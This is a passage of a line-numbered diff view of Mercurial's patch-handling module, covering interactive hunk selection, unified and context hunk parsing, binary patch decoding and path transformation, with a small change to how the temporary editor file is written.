1000 1000 return '<hunk %r@%d>' % (self.filename(), self.fromline)
1001 1001
1002 1002 def getmessages():
1003 1003 return {
1004 1004 'multiple': {
1005 1005 'apply': _("apply change %d/%d to '%s'?"),
1006 1006 'discard': _("discard change %d/%d to '%s'?"),
1007 1007 'record': _("record change %d/%d to '%s'?"),
1008 1008 },
1009 1009 'single': {
1010 1010 'apply': _("apply this change to '%s'?"),
1011 1011 'discard': _("discard this change to '%s'?"),
1012 1012 'record': _("record this change to '%s'?"),
1013 1013 },
1014 1014 'help': {
1015 1015 'apply': _('[Ynesfdaq?]'
1016 1016 '$$ &Yes, apply this change'
1017 1017 '$$ &No, skip this change'
1018 1018 '$$ &Edit this change manually'
1019 1019 '$$ &Skip remaining changes to this file'
1020 1020 '$$ Apply remaining changes to this &file'
1021 1021 '$$ &Done, skip remaining changes and files'
1022 1022 '$$ Apply &all changes to all remaining files'
1023 1023 '$$ &Quit, applying no changes'
1024 1024 '$$ &? (display help)'),
1025 1025 'discard': _('[Ynesfdaq?]'
1026 1026 '$$ &Yes, discard this change'
1027 1027 '$$ &No, skip this change'
1028 1028 '$$ &Edit this change manually'
1029 1029 '$$ &Skip remaining changes to this file'
1030 1030 '$$ Discard remaining changes to this &file'
1031 1031 '$$ &Done, skip remaining changes and files'
1032 1032 '$$ Discard &all changes to all remaining files'
1033 1033 '$$ &Quit, discarding no changes'
1034 1034 '$$ &? (display help)'),
1035 1035 'record': _('[Ynesfdaq?]'
1036 1036 '$$ &Yes, record this change'
1037 1037 '$$ &No, skip this change'
1038 1038 '$$ &Edit this change manually'
1039 1039 '$$ &Skip remaining changes to this file'
1040 1040 '$$ Record remaining changes to this &file'
1041 1041 '$$ &Done, skip remaining changes and files'
1042 1042 '$$ Record &all changes to all remaining files'
1043 1043 '$$ &Quit, recording no changes'
1044 1044 '$$ &? (display help)'),
1045 1045 }
1046 1046 }
1047 1047
1048 1048 def filterpatch(ui, headers, operation=None):
1049 1049 """Interactively filter patch chunks into applied-only chunks"""
1050 1050 messages = getmessages()
1051 1051
1052 1052 if operation is None:
1053 1053 operation = 'record'
1054 1054
1055 1055 def prompt(skipfile, skipall, query, chunk):
1056 1056 """prompt query, and process base inputs
1057 1057
1058 1058 - y/n for the rest of file
1059 1059 - y/n for the rest
1060 1060 - ? (help)
1061 1061 - q (quit)
1062 1062
1063 1063 Return True/False and possibly updated skipfile and skipall.
1064 1064 """
1065 1065 newpatches = None
1066 1066 if skipall is not None:
1067 1067 return skipall, skipfile, skipall, newpatches
1068 1068 if skipfile is not None:
1069 1069 return skipfile, skipfile, skipall, newpatches
1070 1070 while True:
1071 1071 resps = messages['help'][operation]
1072 1072 r = ui.promptchoice("%s %s" % (query, resps))
1073 1073 ui.write("\n")
1074 1074 if r == 8: # ?
1075 1075 for c, t in ui.extractchoices(resps)[1]:
1076 1076 ui.write('%s - %s\n' % (c, encoding.lower(t)))
1077 1077 continue
1078 1078 elif r == 0: # yes
1079 1079 ret = True
1080 1080 elif r == 1: # no
1081 1081 ret = False
1082 1082 elif r == 2: # Edit patch
1083 1083 if chunk is None:
1084 1084 ui.write(_('cannot edit patch for whole file'))
1085 1085 ui.write("\n")
1086 1086 continue
1087 1087 if chunk.header.binary():
1088 1088 ui.write(_('cannot edit patch for binary file'))
1089 1089 ui.write("\n")
1090 1090 continue
1091 1091 # Patch comment based on the Git one (based on comment at end of
1092 1092 # https://mercurial-scm.org/wiki/RecordExtension)
1093 1093 phelp = '---' + _("""
1094 1094 To remove '-' lines, make them ' ' lines (context).
1095 1095 To remove '+' lines, delete them.
1096 1096 Lines starting with # will be removed from the patch.
1097 1097
1098 1098 If the patch applies cleanly, the edited hunk will immediately be
1099 1099 added to the record list. If it does not apply cleanly, a rejects
1100 1100 file will be generated: you can use that when you try again. If
1101 1101 all lines of the hunk are removed, then the edit is aborted and
1102 1102 the hunk is left unchanged.
1103 1103 """)
1104 1104 (patchfd, patchfn) = tempfile.mkstemp(prefix="hg-editor-",
1105 suffix=".diff", text=True)
1105 suffix=".diff")
1106 1106 ncpatchfp = None
1107 1107 try:
1108 1108 # Write the initial patch
1109 f = os.fdopen(patchfd, r"w")
1109 f = util.nativeeolwriter(os.fdopen(patchfd, r'wb'))
1110 1110 chunk.header.write(f)
1111 1111 chunk.write(f)
1112 1112 f.write('\n'.join(['# ' + i for i in phelp.splitlines()]))
1113 1113 f.close()
1114 1114 # Start the editor and wait for it to complete
1115 1115 editor = ui.geteditor()
1116 1116 ret = ui.system("%s \"%s\"" % (editor, patchfn),
1117 1117 environ={'HGUSER': ui.username()},
1118 1118 blockedtag='filterpatch')
1119 1119 if ret != 0:
1120 1120 ui.warn(_("editor exited with exit code %d\n") % ret)
1121 1121 continue
1122 1122 # Remove comment lines
1123 1123 patchfp = open(patchfn)
1124 1124 ncpatchfp = stringio()
1125 1125 for line in util.iterfile(patchfp):
1126 1126 if not line.startswith('#'):
1127 1127 ncpatchfp.write(line)
1128 1128 patchfp.close()
1129 1129 ncpatchfp.seek(0)
1130 1130 newpatches = parsepatch(ncpatchfp)
1131 1131 finally:
1132 1132 os.unlink(patchfn)
1133 1133 del ncpatchfp
1134 1134 # Signal that the chunk shouldn't be applied as-is, but
1135 1135 # provide the new patch to be used instead.
1136 1136 ret = False
1137 1137 elif r == 3: # Skip
1138 1138 ret = skipfile = False
1139 1139 elif r == 4: # file (Record remaining)
1140 1140 ret = skipfile = True
1141 1141 elif r == 5: # done, skip remaining
1142 1142 ret = skipall = False
1143 1143 elif r == 6: # all
1144 1144 ret = skipall = True
1145 1145 elif r == 7: # quit
1146 1146 raise error.Abort(_('user quit'))
1147 1147 return ret, skipfile, skipall, newpatches
1148 1148
1149 1149 seen = set()
1150 1150 applied = {} # 'filename' -> [] of chunks
1151 1151 skipfile, skipall = None, None
1152 1152 pos, total = 1, sum(len(h.hunks) for h in headers)
1153 1153 for h in headers:
1154 1154 pos += len(h.hunks)
1155 1155 skipfile = None
1156 1156 fixoffset = 0
1157 1157 hdr = ''.join(h.header)
1158 1158 if hdr in seen:
1159 1159 continue
1160 1160 seen.add(hdr)
1161 1161 if skipall is None:
1162 1162 h.pretty(ui)
1163 1163 msg = (_('examine changes to %s?') %
1164 1164 _(' and ').join("'%s'" % f for f in h.files()))
1165 1165 r, skipfile, skipall, np = prompt(skipfile, skipall, msg, None)
1166 1166 if not r:
1167 1167 continue
1168 1168 applied[h.filename()] = [h]
1169 1169 if h.allhunks():
1170 1170 applied[h.filename()] += h.hunks
1171 1171 continue
1172 1172 for i, chunk in enumerate(h.hunks):
1173 1173 if skipfile is None and skipall is None:
1174 1174 chunk.pretty(ui)
1175 1175 if total == 1:
1176 1176 msg = messages['single'][operation] % chunk.filename()
1177 1177 else:
1178 1178 idx = pos - len(h.hunks) + i
1179 1179 msg = messages['multiple'][operation] % (idx, total,
1180 1180 chunk.filename())
1181 1181 r, skipfile, skipall, newpatches = prompt(skipfile,
1182 1182 skipall, msg, chunk)
1183 1183 if r:
1184 1184 if fixoffset:
1185 1185 chunk = copy.copy(chunk)
1186 1186 chunk.toline += fixoffset
1187 1187 applied[chunk.filename()].append(chunk)
1188 1188 elif newpatches is not None:
1189 1189 for newpatch in newpatches:
1190 1190 for newhunk in newpatch.hunks:
1191 1191 if fixoffset:
1192 1192 newhunk.toline += fixoffset
1193 1193 applied[newhunk.filename()].append(newhunk)
1194 1194 else:
1195 1195 fixoffset += chunk.removed - chunk.added
1196 1196 return (sum([h for h in applied.itervalues()
1197 1197 if h[0].special() or len(h) > 1], []), {})
1198 1198 class hunk(object):
1199 1199 def __init__(self, desc, num, lr, context):
1200 1200 self.number = num
1201 1201 self.desc = desc
1202 1202 self.hunk = [desc]
1203 1203 self.a = []
1204 1204 self.b = []
1205 1205 self.starta = self.lena = None
1206 1206 self.startb = self.lenb = None
1207 1207 if lr is not None:
1208 1208 if context:
1209 1209 self.read_context_hunk(lr)
1210 1210 else:
1211 1211 self.read_unified_hunk(lr)
1212 1212
1213 1213 def getnormalized(self):
1214 1214 """Return a copy with line endings normalized to LF."""
1215 1215
1216 1216 def normalize(lines):
1217 1217 nlines = []
1218 1218 for line in lines:
1219 1219 if line.endswith('\r\n'):
1220 1220 line = line[:-2] + '\n'
1221 1221 nlines.append(line)
1222 1222 return nlines
1223 1223
1224 1224 # Dummy object, it is rebuilt manually
1225 1225 nh = hunk(self.desc, self.number, None, None)
1226 1226 nh.number = self.number
1227 1227 nh.desc = self.desc
1228 1228 nh.hunk = self.hunk
1229 1229 nh.a = normalize(self.a)
1230 1230 nh.b = normalize(self.b)
1231 1231 nh.starta = self.starta
1232 1232 nh.startb = self.startb
1233 1233 nh.lena = self.lena
1234 1234 nh.lenb = self.lenb
1235 1235 return nh
1236 1236
1237 1237 def read_unified_hunk(self, lr):
1238 1238 m = unidesc.match(self.desc)
1239 1239 if not m:
1240 1240 raise PatchError(_("bad hunk #%d") % self.number)
1241 1241 self.starta, self.lena, self.startb, self.lenb = m.groups()
1242 1242 if self.lena is None:
1243 1243 self.lena = 1
1244 1244 else:
1245 1245 self.lena = int(self.lena)
1246 1246 if self.lenb is None:
1247 1247 self.lenb = 1
1248 1248 else:
1249 1249 self.lenb = int(self.lenb)
1250 1250 self.starta = int(self.starta)
1251 1251 self.startb = int(self.startb)
1252 1252 diffhelpers.addlines(lr, self.hunk, self.lena, self.lenb, self.a,
1253 1253 self.b)
1254 1254 # if we hit eof before finishing out the hunk, the last line will
1255 1255 # be zero length. Lets try to fix it up.
1256 1256 while len(self.hunk[-1]) == 0:
1257 1257 del self.hunk[-1]
1258 1258 del self.a[-1]
1259 1259 del self.b[-1]
1260 1260 self.lena -= 1
1261 1261 self.lenb -= 1
1262 1262 self._fixnewline(lr)
1263 1263
1264 1264 def read_context_hunk(self, lr):
1265 1265 self.desc = lr.readline()
1266 1266 m = contextdesc.match(self.desc)
1267 1267 if not m:
1268 1268 raise PatchError(_("bad hunk #%d") % self.number)
1269 1269 self.starta, aend = m.groups()
1270 1270 self.starta = int(self.starta)
1271 1271 if aend is None:
1272 1272 aend = self.starta
1273 1273 self.lena = int(aend) - self.starta
1274 1274 if self.starta:
1275 1275 self.lena += 1
1276 1276 for x in xrange(self.lena):
1277 1277 l = lr.readline()
1278 1278 if l.startswith('---'):
1279 1279 # lines addition, old block is empty
1280 1280 lr.push(l)
1281 1281 break
1282 1282 s = l[2:]
1283 1283 if l.startswith('- ') or l.startswith('! '):
1284 1284 u = '-' + s
1285 1285 elif l.startswith(' '):
1286 1286 u = ' ' + s
1287 1287 else:
1288 1288 raise PatchError(_("bad hunk #%d old text line %d") %
1289 1289 (self.number, x))
1290 1290 self.a.append(u)
1291 1291 self.hunk.append(u)
1292 1292
1293 1293 l = lr.readline()
1294 1294 if l.startswith('\ '):
1295 1295 s = self.a[-1][:-1]
1296 1296 self.a[-1] = s
1297 1297 self.hunk[-1] = s
1298 1298 l = lr.readline()
1299 1299 m = contextdesc.match(l)
1300 1300 if not m:
1301 1301 raise PatchError(_("bad hunk #%d") % self.number)
1302 1302 self.startb, bend = m.groups()
1303 1303 self.startb = int(self.startb)
1304 1304 if bend is None:
1305 1305 bend = self.startb
1306 1306 self.lenb = int(bend) - self.startb
1307 1307 if self.startb:
1308 1308 self.lenb += 1
1309 1309 hunki = 1
1310 1310 for x in xrange(self.lenb):
1311 1311 l = lr.readline()
1312 1312 if l.startswith('\ '):
1313 1313 # XXX: the only way to hit this is with an invalid line range.
1314 1314 # The no-eol marker is not counted in the line range, but I
1315 1315 # guess there are diff(1) out there which behave differently.
1316 1316 s = self.b[-1][:-1]
1317 1317 self.b[-1] = s
1318 1318 self.hunk[hunki - 1] = s
1319 1319 continue
1320 1320 if not l:
1321 1321 # line deletions, new block is empty and we hit EOF
1322 1322 lr.push(l)
1323 1323 break
1324 1324 s = l[2:]
1325 1325 if l.startswith('+ ') or l.startswith('! '):
1326 1326 u = '+' + s
1327 1327 elif l.startswith(' '):
1328 1328 u = ' ' + s
1329 1329 elif len(self.b) == 0:
1330 1330 # line deletions, new block is empty
1331 1331 lr.push(l)
1332 1332 break
1333 1333 else:
1334 1334 raise PatchError(_("bad hunk #%d old text line %d") %
1335 1335 (self.number, x))
1336 1336 self.b.append(s)
1337 1337 while True:
1338 1338 if hunki >= len(self.hunk):
1339 1339 h = ""
1340 1340 else:
1341 1341 h = self.hunk[hunki]
1342 1342 hunki += 1
1343 1343 if h == u:
1344 1344 break
1345 1345 elif h.startswith('-'):
1346 1346 continue
1347 1347 else:
1348 1348 self.hunk.insert(hunki - 1, u)
1349 1349 break
1350 1350
1351 1351 if not self.a:
1352 1352 # this happens when lines were only added to the hunk
1353 1353 for x in self.hunk:
1354 1354 if x.startswith('-') or x.startswith(' '):
1355 1355 self.a.append(x)
1356 1356 if not self.b:
1357 1357 # this happens when lines were only deleted from the hunk
1358 1358 for x in self.hunk:
1359 1359 if x.startswith('+') or x.startswith(' '):
1360 1360 self.b.append(x[1:])
1361 1361 # @@ -start,len +start,len @@
1362 1362 self.desc = "@@ -%d,%d +%d,%d @@\n" % (self.starta, self.lena,
1363 1363 self.startb, self.lenb)
1364 1364 self.hunk[0] = self.desc
1365 1365 self._fixnewline(lr)
1366 1366
1367 1367 def _fixnewline(self, lr):
1368 1368 l = lr.readline()
1369 1369 if l.startswith('\ '):
1370 1370 diffhelpers.fix_newline(self.hunk, self.a, self.b)
1371 1371 else:
1372 1372 lr.push(l)
1373 1373
1374 1374 def complete(self):
1375 1375 return len(self.a) == self.lena and len(self.b) == self.lenb
1376 1376
1377 1377 def _fuzzit(self, old, new, fuzz, toponly):
1378 1378 # this removes context lines from the top and bottom of list 'l'. It
1379 1379 # checks the hunk to make sure only context lines are removed, and then
1380 1380 # returns a new shortened list of lines.
1381 1381 fuzz = min(fuzz, len(old))
1382 1382 if fuzz:
1383 1383 top = 0
1384 1384 bot = 0
1385 1385 hlen = len(self.hunk)
1386 1386 for x in xrange(hlen - 1):
1387 1387 # the hunk starts with the @@ line, so use x+1
1388 1388 if self.hunk[x + 1][0] == ' ':
1389 1389 top += 1
1390 1390 else:
1391 1391 break
1392 1392 if not toponly:
1393 1393 for x in xrange(hlen - 1):
1394 1394 if self.hunk[hlen - bot - 1][0] == ' ':
1395 1395 bot += 1
1396 1396 else:
1397 1397 break
1398 1398
1399 1399 bot = min(fuzz, bot)
1400 1400 top = min(fuzz, top)
1401 1401 return old[top:len(old) - bot], new[top:len(new) - bot], top
1402 1402 return old, new, 0
1403 1403
1404 1404 def fuzzit(self, fuzz, toponly):
1405 1405 old, new, top = self._fuzzit(self.a, self.b, fuzz, toponly)
1406 1406 oldstart = self.starta + top
1407 1407 newstart = self.startb + top
1408 1408 # zero length hunk ranges already have their start decremented
1409 1409 if self.lena and oldstart > 0:
1410 1410 oldstart -= 1
1411 1411 if self.lenb and newstart > 0:
1412 1412 newstart -= 1
1413 1413 return old, oldstart, new, newstart
1414 1414
1415 1415 class binhunk(object):
1416 1416 'A binary patch file.'
1417 1417 def __init__(self, lr, fname):
1418 1418 self.text = None
1419 1419 self.delta = False
1420 1420 self.hunk = ['GIT binary patch\n']
1421 1421 self._fname = fname
1422 1422 self._read(lr)
1423 1423
1424 1424 def complete(self):
1425 1425 return self.text is not None
1426 1426
1427 1427 def new(self, lines):
1428 1428 if self.delta:
1429 1429 return [applybindelta(self.text, ''.join(lines))]
1430 1430 return [self.text]
1431 1431
1432 1432 def _read(self, lr):
1433 1433 def getline(lr, hunk):
1434 1434 l = lr.readline()
1435 1435 hunk.append(l)
1436 1436 return l.rstrip('\r\n')
1437 1437
1438 1438 size = 0
1439 1439 while True:
1440 1440 line = getline(lr, self.hunk)
1441 1441 if not line:
1442 1442 raise PatchError(_('could not extract "%s" binary data')
1443 1443 % self._fname)
1444 1444 if line.startswith('literal '):
1445 1445 size = int(line[8:].rstrip())
1446 1446 break
1447 1447 if line.startswith('delta '):
1448 1448 size = int(line[6:].rstrip())
1449 1449 self.delta = True
1450 1450 break
1451 1451 dec = []
1452 1452 line = getline(lr, self.hunk)
1453 1453 while len(line) > 1:
1454 1454 l = line[0:1]
1455 1455 if l <= 'Z' and l >= 'A':
1456 1456 l = ord(l) - ord('A') + 1
1457 1457 else:
1458 1458 l = ord(l) - ord('a') + 27
1459 1459 try:
1460 1460 dec.append(util.b85decode(line[1:])[:l])
1461 1461 except ValueError as e:
1462 1462 raise PatchError(_('could not decode "%s" binary patch: %s')
1463 1463 % (self._fname, util.forcebytestr(e)))
1464 1464 line = getline(lr, self.hunk)
1465 1465 text = zlib.decompress(''.join(dec))
1466 1466 if len(text) != size:
1467 1467 raise PatchError(_('"%s" length is %d bytes, should be %d')
1468 1468 % (self._fname, len(text), size))
1469 1469 self.text = text
1470 1470
1471 1471 def parsefilename(str):
1472 1472 # --- filename \t|space stuff
1473 1473 s = str[4:].rstrip('\r\n')
1474 1474 i = s.find('\t')
1475 1475 if i < 0:
1476 1476 i = s.find(' ')
1477 1477 if i < 0:
1478 1478 return s
1479 1479 return s[:i]
1480 1480
1481 1481 def reversehunks(hunks):
1482 1482 '''reverse the signs in the hunks given as argument
1483 1483
1484 1484 This function operates on hunks coming out of patch.filterpatch, that is
1485 1485 a list of the form: [header1, hunk1, hunk2, header2...]. Example usage:
1486 1486
1487 1487 >>> rawpatch = b"""diff --git a/folder1/g b/folder1/g
1488 1488 ... --- a/folder1/g
1489 1489 ... +++ b/folder1/g
1490 1490 ... @@ -1,7 +1,7 @@
1491 1491 ... +firstline
1492 1492 ... c
1493 1493 ... 1
1494 1494 ... 2
1495 1495 ... + 3
1496 1496 ... -4
1497 1497 ... 5
1498 1498 ... d
1499 1499 ... +lastline"""
1500 1500 >>> hunks = parsepatch([rawpatch])
1501 1501 >>> hunkscomingfromfilterpatch = []
1502 1502 >>> for h in hunks:
1503 1503 ... hunkscomingfromfilterpatch.append(h)
1504 1504 ... hunkscomingfromfilterpatch.extend(h.hunks)
1505 1505
1506 1506 >>> reversedhunks = reversehunks(hunkscomingfromfilterpatch)
1507 1507 >>> from . import util
1508 1508 >>> fp = util.stringio()
1509 1509 >>> for c in reversedhunks:
1510 1510 ... c.write(fp)
1511 1511 >>> fp.seek(0) or None
1512 1512 >>> reversedpatch = fp.read()
1513 1513 >>> print(pycompat.sysstr(reversedpatch))
1514 1514 diff --git a/folder1/g b/folder1/g
1515 1515 --- a/folder1/g
1516 1516 +++ b/folder1/g
1517 1517 @@ -1,4 +1,3 @@
1518 1518 -firstline
1519 1519 c
1520 1520 1
1521 1521 2
1522 1522 @@ -2,6 +1,6 @@
1523 1523 c
1524 1524 1
1525 1525 2
1526 1526 - 3
1527 1527 +4
1528 1528 5
1529 1529 d
1530 1530 @@ -6,3 +5,2 @@
1531 1531 5
1532 1532 d
1533 1533 -lastline
1534 1534
1535 1535 '''
1536 1536
1537 1537 newhunks = []
1538 1538 for c in hunks:
1539 1539 if util.safehasattr(c, 'reversehunk'):
1540 1540 c = c.reversehunk()
1541 1541 newhunks.append(c)
1542 1542 return newhunks
1543 1543
1544 1544 def parsepatch(originalchunks, maxcontext=None):
1545 1545 """patch -> [] of headers -> [] of hunks
1546 1546
1547 1547 If maxcontext is not None, trim context lines if necessary.
1548 1548
1549 1549 >>> rawpatch = b'''diff --git a/folder1/g b/folder1/g
1550 1550 ... --- a/folder1/g
1551 1551 ... +++ b/folder1/g
1552 1552 ... @@ -1,8 +1,10 @@
1553 1553 ... 1
1554 1554 ... 2
1555 1555 ... -3
1556 1556 ... 4
1557 1557 ... 5
1558 1558 ... 6
1559 1559 ... +6.1
1560 1560 ... +6.2
1561 1561 ... 7
1562 1562 ... 8
1563 1563 ... +9'''
1564 1564 >>> out = util.stringio()
1565 1565 >>> headers = parsepatch([rawpatch], maxcontext=1)
1566 1566 >>> for header in headers:
1567 1567 ... header.write(out)
1568 1568 ... for hunk in header.hunks:
1569 1569 ... hunk.write(out)
1570 1570 >>> print(pycompat.sysstr(out.getvalue()))
1571 1571 diff --git a/folder1/g b/folder1/g
1572 1572 --- a/folder1/g
1573 1573 +++ b/folder1/g
1574 1574 @@ -2,3 +2,2 @@
1575 1575 2
1576 1576 -3
1577 1577 4
1578 1578 @@ -6,2 +5,4 @@
1579 1579 6
1580 1580 +6.1
1581 1581 +6.2
1582 1582 7
1583 1583 @@ -8,1 +9,2 @@
1584 1584 8
1585 1585 +9
1586 1586 """
1587 1587 class parser(object):
1588 1588 """patch parsing state machine"""
1589 1589 def __init__(self):
1590 1590 self.fromline = 0
1591 1591 self.toline = 0
1592 1592 self.proc = ''
1593 1593 self.header = None
1594 1594 self.context = []
1595 1595 self.before = []
1596 1596 self.hunk = []
1597 1597 self.headers = []
1598 1598
1599 1599 def addrange(self, limits):
1600 1600 fromstart, fromend, tostart, toend, proc = limits
1601 1601 self.fromline = int(fromstart)
1602 1602 self.toline = int(tostart)
1603 1603 self.proc = proc
1604 1604
1605 1605 def addcontext(self, context):
1606 1606 if self.hunk:
1607 1607 h = recordhunk(self.header, self.fromline, self.toline,
1608 1608 self.proc, self.before, self.hunk, context, maxcontext)
1609 1609 self.header.hunks.append(h)
1610 1610 self.fromline += len(self.before) + h.removed
1611 1611 self.toline += len(self.before) + h.added
1612 1612 self.before = []
1613 1613 self.hunk = []
1614 1614 self.context = context
1615 1615
1616 1616 def addhunk(self, hunk):
1617 1617 if self.context:
1618 1618 self.before = self.context
1619 1619 self.context = []
1620 1620 self.hunk = hunk
1621 1621
1622 1622 def newfile(self, hdr):
1623 1623 self.addcontext([])
1624 1624 h = header(hdr)
1625 1625 self.headers.append(h)
1626 1626 self.header = h
1627 1627
1628 1628 def addother(self, line):
1629 1629 pass # 'other' lines are ignored
1630 1630
1631 1631 def finished(self):
1632 1632 self.addcontext([])
1633 1633 return self.headers
1634 1634
1635 1635 transitions = {
1636 1636 'file': {'context': addcontext,
1637 1637 'file': newfile,
1638 1638 'hunk': addhunk,
1639 1639 'range': addrange},
1640 1640 'context': {'file': newfile,
1641 1641 'hunk': addhunk,
1642 1642 'range': addrange,
1643 1643 'other': addother},
1644 1644 'hunk': {'context': addcontext,
1645 1645 'file': newfile,
1646 1646 'range': addrange},
1647 1647 'range': {'context': addcontext,
1648 1648 'hunk': addhunk},
1649 1649 'other': {'other': addother},
1650 1650 }
1651 1651
1652 1652 p = parser()
1653 1653 fp = stringio()
1654 1654 fp.write(''.join(originalchunks))
1655 1655 fp.seek(0)
1656 1656
1657 1657 state = 'context'
1658 1658 for newstate, data in scanpatch(fp):
1659 1659 try:
1660 1660 p.transitions[state][newstate](p, data)
1661 1661 except KeyError:
1662 1662 raise PatchError('unhandled transition: %s -> %s' %
1663 1663 (state, newstate))
1664 1664 state = newstate
1665 1665 del fp
1666 1666 return p.finished()
1667 1667
1668 1668 def pathtransform(path, strip, prefix):
1669 1669 '''turn a path from a patch into a path suitable for the repository
1670 1670
1671 1671 prefix, if not empty, is expected to be normalized with a / at the end.
1672 1672
1673 1673 Returns (stripped components, path in repository).
1674 1674
1675 1675 >>> pathtransform(b'a/b/c', 0, b'')
1676 1676 ('', 'a/b/c')
1677 1677 >>> pathtransform(b' a/b/c ', 0, b'')
1678 1678 ('', ' a/b/c')
1679 1679 >>> pathtransform(b' a/b/c ', 2, b'')
1680 1680 ('a/b/', 'c')
1681 1681 >>> pathtransform(b'a/b/c', 0, b'd/e/')
1682 1682 ('', 'd/e/a/b/c')
1683 1683 >>> pathtransform(b' a//b/c ', 2, b'd/e/')
1684 1684 ('a//b/', 'd/e/c')
1685 1685 >>> pathtransform(b'a/b/c', 3, b'')
1686 1686 Traceback (most recent call last):
1687 1687 PatchError: unable to strip away 1 of 3 dirs from a/b/c
1688 1688 '''
1689 1689 pathlen = len(path)
1690 1690 i = 0
1691 1691 if strip == 0:
1692 1692 return '', prefix + path.rstrip()
1693 1693 count = strip
1694 1694 while count > 0:
1695 1695 i = path.find('/', i)
1696 1696 if i == -1:
1697 1697 raise PatchError(_("unable to strip away %d of %d dirs from %s") %
1698 1698 (count, strip, path))
1699 1699 i += 1
1700 1700 # consume '//' in the path
1701 1701 while i < pathlen - 1 and path[i:i + 1] == '/':
1702 1702 i += 1
1703 1703 count -= 1
1704 1704 return path[:i].lstrip(), prefix + path[i:].rstrip()
1705 1705
1706 1706 def makepatchmeta(backend, afile_orig, bfile_orig, hunk, strip, prefix):
1707 1707 nulla = afile_orig == "/dev/null"
1708 1708 nullb = bfile_orig == "/dev/null"
1709 1709 create = nulla and hunk.starta == 0 and hunk.lena == 0
1710 1710 remove = nullb and hunk.startb == 0 and hunk.lenb == 0
1711 1711 abase, afile = pathtransform(afile_orig, strip, prefix)
1712 1712 gooda = not nulla and backend.exists(afile)
1713 1713 bbase, bfile = pathtransform(bfile_orig, strip, prefix)
1714 1714 if afile == bfile:
1715 1715 goodb = gooda
1716 1716 else:
1717 1717 goodb = not nullb and backend.exists(bfile)
1718 1718 missing = not goodb and not gooda and not create
1719 1719
1720 1720 # some diff programs apparently produce patches where the afile is
1721 1721 # not /dev/null, but afile starts with bfile
1722 1722 abasedir = afile[:afile.rfind('/') + 1]
1723 1723 bbasedir = bfile[:bfile.rfind('/') + 1]
1724 1724 if (missing and abasedir == bbasedir and afile.startswith(bfile)
1725 1725 and hunk.starta == 0 and hunk.lena == 0):
1726 1726 create = True
1727 1727 missing = False
1728 1728
1729 1729 # If afile is "a/b/foo" and bfile is "a/b/foo.orig" we assume the
1730 1730 # diff is between a file and its backup. In this case, the original
1731 1731 # file should be patched (see original mpatch code).
1732 1732 isbackup = (abase == bbase and bfile.startswith(afile))
1733 1733 fname = None
1734 1734 if not missing:
1735 1735 if gooda and goodb:
1736 1736 if isbackup:
1737 1737 fname = afile
1738 1738 else:
1739 1739 fname = bfile
1740 1740 elif gooda:
1741 1741 fname = afile
1742 1742
1743 1743 if not fname:
1744 1744 if not nullb:
1745 1745 if isbackup:
1746 1746 fname = afile
1747 1747 else:
1748 1748 fname = bfile
1749 1749 elif not nulla:
1750 1750 fname = afile
1751 1751 else:
1752 1752 raise PatchError(_("undefined source and destination files"))
1753 1753
1754 1754 gp = patchmeta(fname)
1755 1755 if create:
1756 1756 gp.op = 'ADD'
1757 1757 elif remove:
1758 1758 gp.op = 'DELETE'
1759 1759 return gp
1760 1760
1761 1761 def scanpatch(fp):
1762 1762 """like patch.iterhunks, but yield different events
1763 1763
1764 1764 - ('file', [header_lines + fromfile + tofile])
1765 1765 - ('context', [context_lines])
1766 1766 - ('hunk', [hunk_lines])
1767 1767 - ('range', (-start,len, +start,len, proc))
1768 1768 """
1769 1769 lines_re = re.compile(br'@@ -(\d+),(\d+) \+(\d+),(\d+) @@\s*(.*)')
1770 1770 lr = linereader(fp)
1771 1771
1772 1772 def scanwhile(first, p):
1773 1773 """scan lr while predicate holds"""
1774 1774 lines = [first]
1775 1775 for line in iter(lr.readline, ''):
1776 1776 if p(line):
1777 1777 lines.append(line)
1778 1778 else:
1779 1779 lr.push(line)
1780 1780 break
1781 1781 return lines
1782 1782
1783 1783 for line in iter(lr.readline, ''):
1784 1784 if line.startswith('diff --git a/') or line.startswith('diff -r '):
1785 1785 def notheader(line):
1786 1786 s = line.split(None, 1)
1787 1787 return not s or s[0] not in ('---', 'diff')
1788 1788 header = scanwhile(line, notheader)
1789 1789 fromfile = lr.readline()
1790 1790 if fromfile.startswith('---'):
1791 1791 tofile = lr.readline()
1792 1792 header += [fromfile, tofile]
1793 1793 else:
1794 1794 lr.push(fromfile)
1795 1795 yield 'file', header
1796 1796 elif line[0:1] == ' ':
1797 1797 yield 'context', scanwhile(line, lambda l: l[0] in ' \\')
1798 1798 elif line[0] in '-+':
1799 1799 yield 'hunk', scanwhile(line, lambda l: l[0] in '-+\\')
1800 1800 else:
1801 1801 m = lines_re.match(line)
1802 1802 if m:
1803 1803 yield 'range', m.groups()
1804 1804 else:
1805 1805 yield 'other', line
1806 1806
1807 1807 def scangitpatch(lr, firstline):
1808 1808 """
1809 1809 Git patches can emit:
1810 1810 - rename a to b
1811 1811 - change b
1812 1812 - copy a to c
1813 1813 - change c
1814 1814
1815 1815 We cannot apply this sequence as-is, the renamed 'a' could not be
1816 1816 found for it would have been renamed already. And we cannot copy
1817 1817 from 'b' instead because 'b' would have been changed already. So
1818 1818 we scan the git patch for copy and rename commands so we can
1819 1819 perform the copies ahead of time.
1820 1820 """
1821 1821 pos = 0
1822 1822 try:
1823 1823 pos = lr.fp.tell()
1824 1824 fp = lr.fp
1825 1825 except IOError:
1826 1826 fp = stringio(lr.fp.read())
1827 1827 gitlr = linereader(fp)
1828 1828 gitlr.push(firstline)
1829 1829 gitpatches = readgitpatch(gitlr)
1830 1830 fp.seek(pos)
1831 1831 return gitpatches
1832 1832
1833 1833 def iterhunks(fp):
1834 1834 """Read a patch and yield the following events:
1835 1835 - ("file", afile, bfile, firsthunk): select a new target file.
1836 1836 - ("hunk", hunk): a new hunk is ready to be applied, follows a
1837 1837 "file" event.
1838 1838 - ("git", gitchanges): current diff is in git format, gitchanges
1839 1839 maps filenames to gitpatch records. Unique event.
1840 1840 """
1841 1841 afile = ""
1842 1842 bfile = ""
1843 1843 state = None
1844 1844 hunknum = 0
1845 1845 emitfile = newfile = False
1846 1846 gitpatches = None
1847 1847
1848 1848 # our states
1849 1849 BFILE = 1
1850 1850 context = None
1851 1851 lr = linereader(fp)
1852 1852
1853 1853 for x in iter(lr.readline, ''):
1854 1854 if state == BFILE and (
1855 1855 (not context and x.startswith('@'))
1856 1856 or (context is not False and x.startswith('***************'))
1857 1857 or x.startswith('GIT binary patch')):
1858 1858 gp = None
1859 1859 if (gitpatches and
1860 1860 gitpatches[-1].ispatching(afile, bfile)):
1861 1861 gp = gitpatches.pop()
1862 1862 if x.startswith('GIT binary patch'):
